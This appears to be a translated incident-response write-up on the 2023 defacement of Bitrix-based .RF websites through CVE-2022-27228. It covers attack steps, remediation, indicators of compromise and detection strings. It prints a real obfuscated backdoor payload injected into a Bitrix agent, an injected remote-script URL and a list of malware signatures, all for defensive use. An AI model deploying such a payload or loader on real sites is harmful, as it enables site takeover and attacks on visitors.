Mass defacement of websites. RF

On May 26, 2023, there was a massive defacement of the web servers of the national segment of the Internet .RF. CMS “Bitrix” acted as the target of the attack.

During the investigation, it turned out that the attack was prepared in advance. Preparations have been underway since 2022 through known vulnerabilities including CVE-2022-27228. See technical description. on the developer forum. Perhaps this is the largest attack against the .RF national segment in its history.

Company CyberOK released report with a description of the attack and an explanation of the necessary actions in order to remove the backdoor from the server, eliminate Bitrix vulnerabilities and restore the application. It also provides recommendations for securing a web application.


Back in July 2022, the National Computer Incident Coordination Center (NCCC) warned about the threat of infection of sites managed by Bitrix through the 0day vulnerability CVE-2022-27228, known since March 3, 2022.

On March 11, 2022, the developer promptly fixed the vulnerability and updated the module vote to version 21.0.100, and the CMS itself to version 22.0.400.

Unfortunately, some system administrators did not receive this information or ignored it.

▍ Vulnerability exploitation

Vulnerability in the module vote Bitrix allows a remote attacker to write arbitrary files to the server by sending specially crafted network packets.

According to description of NCCKI for March 2022, later the attacker used these files to infect client browsers, i.e. website visitors.

1. After exploiting the vulnerability, an attacker uploads a modified file (/bitrix/modules/main/include/prolog.php), which adds the line (https://techmestore[.]pw/jqueryui.js) that calls a third-party JS script jquery-ui.js.
2. When visiting an infected website managed by Bitrix, a JS script is injected into the user’s browser cache, which is loaded from various directories of the website, for example:
   

   • bitrix/js/main/core/core.js?1656612291497726
     
   • bitrix/js/main/core/core.js?1656598434497824
     
   • bitrix/templates/cm_main/js/jquery-1.10.2.min.js

An attacker could use either one infection vector or both at the same time.

So far, we have not observed such an exploitation of the vulnerability. Unlike previous attacks, in May 2023 the vulnerability was used not to redirect users to third-party sites, but to deface and install a backdoor (see below).

In 2023, except for the module votethe attackers also used the service module fileman, which implements the possibility of a visual HTML editor. This module contains a vulnerable script html_editor_action.php. Exploiting this file vulnerability similar to CVE-2022-27228 allows an unauthorized attacker to remotely execute arbitrary code on the target system.

As a result of successful exploitation of this vulnerability, the following will appear in the log:
line with a successful POST request to the file /bitrix/tools/html_editor_action.php like this:

***POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 ***

▍ Description of the 2023 attack

Basic actions after hacking:

• replaced by index.php in the root directory of the web application;
  
• embedding malicious code in PHP scripts of modules;
  
• the file is deleted /bitrix/.settings.php;
  
• Agent scripts with malicious code are created or modified
  existing scripts;
  
• remove data from database tables b_iblock, b_iblock_element, b_iblock_element_property;
  
• creating files .htaccess in all web application directories;
  
• creating PHP scripts in a directory /bitrix/admin/ with arbitrary filenames.

▍ Necessary actions after infection

According to recommendations NKTsKI, after infection, you must perform the following actions:

• Update Bitrix to the current version, at least 22.0.400.
  
• Check website for malicious JS code. For example, you can install from the catalog of ready-made solutions “1C-Bitrix: Search for Trojans‘ and start scanning. To do this, open the site control panel and go to the following tab:

  • Настройки → bitrix.xscan → Поиск и Поиск (бета)

  The module will scan the entire site and display the identified suspicious files.

  

  Based on the current attack, the following indicators of compromise have been identified:

  It is recommended to pay attention to files with a randomly generated name from a character set [a-z, 0-9] in the catalog /bitrix/admin/ and in the root directory of the site.

  The following files were found:

  • /bitrix/admin/f408f2b7df70.php
    
  • /bitrix/admin/8f1c222aae51.php
    
  • /2469a41bac71.php
    
  • /98826/bfd99.php

  If malicious code is detected, measures should be taken to remove it, as well as check the system for compromise.
  

• Check for facts of illegitimate modification of files, using a command that searches for and sorts changed and new files in the last 30 days, except for the last day:

  find /home/Путь к вашей папке Bitrix/public_html -type f -mtime -30 ! -mtime -1 -printf '%TY-%Tm-%Td %TT %p\n' | sort -r

For example, if you check the file bitrix/modules/fileman/admin/fileman_html_editor_action.phpthen we will see following:

“Bad” code

“Good” code

In addition to creating new files, attackers can embed malicious code into existing files. It can be found in the following line fragments:

• str_rot13
  
• md5($_COOKIE
  
• bitrixxx
  
• eval(base64_decode
  
• BX_STAT
  
• BX_TOKEN
  
• parse_str(hex2bin
  
• iasfgjlzcb
  
• QlhfVE9LRU4=
  
• gzinflate(base64_decode
  
• C.A.S
  
• urldecode(base64_decode(hex2bin

From search results for str_rot13 the following files must be excluded:

• /bitrix/modules/main/classes/general/vuln_scanner.php
  
• /bitrix/modules/main/lib/search/content.php
  
• bitrix/modules/socialnetwork/lib/item/logindex.php

On the page with the list of 1C-Bitrix Agents (/bitrix/admin/agent_list.php) you can check the called functions for malicious code. To do this, open the site control panel and go to the tab Настройки → Настройки продукта → Агенты.

The name of the agent can be anything, but it is usually visible visually, as on the KDPV:

After restoring a site or database from a backup, the recommendations are as follows:

• restrict administrative access to the CMS, as well as, if available, FTP, MySQL.
  
• check functions called by agent functions (/bitrix/admin/agent_list.php), for malicious code. Agent modification example:

  $arAgent["NAME"];eval(urldecode(strrev('b3%92%92%22%73%b6%34%a5%b6%76%34%26%86%a5%85%a5%73%b6%96%d4%03%43%65%b4%46%c6%74%a4%26%e4%74%a4%f6%15%d6%36%67%86%96%36%f6%e4%75%05%57%15%74%a4%07%37%97%b4%07%25%97%f4%07%d4%74%a4%f6%43%75%a5%37%a4%84%46%a7%87%45%16%b6%37%44%d4%93%b6%74%a4%f6%94%33%26%d6%47%44%45%d4%65%c6%45%07%36%d6%26%07%a4%84%46%a7%86%35%05%b6%25%97%f4%07%03%c6%94%d6%24%a7%d4%23%95%75%a5%43%d4%d6%d4%d6%65%44%f4%97%55%d6%95%c6%65%74%f4%97%15%75%e4%23%55%d6%d4%53%15%44%a5%43%d4%74%a5%a6%e4%d6%94%26%65%55%35%c4%93%03%45%44%93%64%a4%f6%55%74%a5%67%e4%75%a5%b6%93%64%e4%23%55%23%36%86%a4%75%05%a6%25%97%f4%07%14%44%b4%e6%53%75%16%03%a4%33%26%77%65%d6%36%66%a4%33%26%97%a4%85%a5%76%14%84%16%77%93%44%05%22%82%56%46%f6%36%56%46%f5%43%63%56%37%16%26%02%c2%22%07%86%07%e2%f6%c6%96%57%86%f5%e6%96%47%57%07%f2%37%c6%f6%f6%47%f2%87%96%27%47%96%26%f2%22%e2%d5%22%45%f4%f4%25%f5%45%e4%54%d4%55%34%f4%44%22%b5%25%54%65%25%54%35%f5%42%82%37%47%e6%56%47%e6%f6%36%f5%47%57%07%f5%56%c6%96%66%')));

Recommendations for securing websites:

▍IOC

otrasoper[.]ga/help/?23211651614614
techmestore[.]pw
unasinob[.]cf
core.js?1656612291497726 — d74272539fc1c34fa5db80a168269d319d8c541bb36cbf0e99233cbe7ab9474d
core.js?1656598434497824 — da9c874d43fc94af70bc9895b8154a11aab1118a4b5aefde4c6cee59f617707e
jquery-1.10.2.min.js — 0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988

Note. In some cases, the site may be blocked by the NKTsKI due to the placement of illegal content on the hacked site, as well as due to its use by attackers to conduct computer attacks on critical infrastructure in accordance with Article 5 of Federal Law No. 187-FZ “On the Security of the Critical Information Infrastructure of the Russian Federation ”, paragraph 5.1 of the Order of the FSB of Russia dated July 24, 2018 No. 366 and paragraph 9 of the Rules for the Centralized Management of the Public Communications Network, approved by the Decree of the Government of the Russian Federation of February 12, 2020
No. 127.

After a deface, a text appears on the site that can lead to blocking by the NCCCA due to the placement of illegal content

Blocking is applied until the NCCKI fixes the fact of removal of illegal content.

In this case, after removing the backdoor and fixing the vulnerabilities, it is necessary to contact the team of the National Coordination Center for Computer Incidents.